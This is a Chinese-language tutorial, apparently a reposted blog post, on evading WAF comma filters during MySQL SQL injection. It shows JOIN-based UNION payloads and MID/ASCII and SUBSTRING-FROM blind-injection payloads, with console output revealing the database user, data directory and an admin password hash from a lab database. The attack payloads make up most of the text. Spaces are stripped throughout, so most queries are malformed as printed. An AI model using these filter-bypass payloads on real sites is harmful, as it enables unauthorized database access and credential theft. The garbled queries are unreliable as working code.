SQL注入技巧之显注与盲注中过滤逗号绕过详析
前言
sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧
1.联合查询显注绕过逗号
在联合查询时使用UNIONSELECT1,2,3,4,5,6,7..n这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。
绕过
在显示位上替换为常见的注入变量或其它语句
unionselect1,2,3; unionselect*from((select1)Ajoin(select2)Bjoin(select3)C); unionselect*from((select1)Ajoin(select2)Bjoin(selectgroup_concat(user(),'',database(),'',@@datadir))C);
在数据库中演示联合查询
UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截
mysql>selectuser_id,user,passwordfromusersunionselect1,2,3; +---------+-------+----------------------------------+ |user_id|user|password| +---------+-------+----------------------------------+ |1|admin|5f4dcc3b5aa765d61d8327deb882cf99| |1|2|3| +---------+-------+----------------------------------+ 2rowsinset(0.04sec)
不出现逗号,使用Join来注入
mysql>selectuser_id,user,passwordfromusersunionselect*from((select1)Ajoin(select2)Bjoin(select3)C); +---------+-------+----------------------------------+ |user_id|user|password| +---------+-------+----------------------------------+ |1|admin|5f4dcc3b5aa765d61d8327deb882cf99| |1|2|3| +---------+-------+----------------------------------+ 2rowsinset(0.05sec)
查询我们想要的数据
mysql>selectuser_id,user,passwordfromusersunionselect*from((select1)Ajoin(select2)Bjoin(selectgroup_concat(user(),'',database(),'',@@datadir))C);; +---------+-------+-------------------------------------------------+ |user_id|user|password| +---------+-------+-------------------------------------------------+ |1|admin|5f4dcc3b5aa765d61d8327deb882cf99| |1|2|root@192.168.228.1dvwac:\phpStudy\MySQL\data\| +---------+-------+-------------------------------------------------+ 2rowsinset(0.08sec)
2.盲注中逗号绕过
MID和substr函数用于从文本字段中提取字符
mysql>selectmid(user(),1,2); +-----------------+ |mid(user(),1,2)| +-----------------+ |ro| +-----------------+ 1rowinset(0.04sec)
查询数据库用户名第一个字符的ascii码
mysql>selectuser_id,user,passwordfromusersunionselectascii(mid(user(),1,2)),2,3; +---------+-------+----------------------------------+ |user_id|user|password| +---------+-------+----------------------------------+ |1|admin|5f4dcc3b5aa765d61d8327deb882cf99| |114|2|3| +---------+-------+----------------------------------+ 2rowsinset(0.05sec)
盲注,通过猜ascii值
mysql>selectuser_id,user,passwordfromuserswhereuser_id=1and(selectascii(mid(user(),1,2))=115); Emptyset mysql>selectuser_id,user,passwordfromuserswhereuser_id=1and(selectascii(mid(user(),1,2))=114); +---------+-------+----------------------------------+ |user_id|user|password| +---------+-------+----------------------------------+ |1|admin|5f4dcc3b5aa765d61d8327deb882cf99| +---------+-------+----------------------------------+ 1rowinset(0.04sec)
逗号绕过SUBTTRING函数
substring(strFROMpos)
从字符串str的起始位置pos返回一个子串
mysql>selectsubstring('hello'from1); +---------------------------+ |substring('hello'from1)| +---------------------------+ |hello| +---------------------------+ 1rowinset(0.04sec) mysql>selectsubstring('hello'from2); +---------------------------+ |substring('hello'from2)| +---------------------------+ |ello| +---------------------------+ 1rowinset(0.03sec)
注入
mysql>selectuser_id,user,passwordfromuserswhereuser_id=1and(ascii(substring(user()from2))=114); Emptyset //substring(user()from2)为o //o的ascii为111, mysql>selectuser_id,user,passwordfromuserswhereuser_id=1and(ascii(substring(user()from2))=111); +---------+-------+----------------------------------+ |user_id|user|password| +---------+-------+----------------------------------+ |1|admin|5f4dcc3b5aa765d61d8327deb882cf99| +---------+-------+----------------------------------+ 1rowinset(0.03sec)
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对毛票票的支持。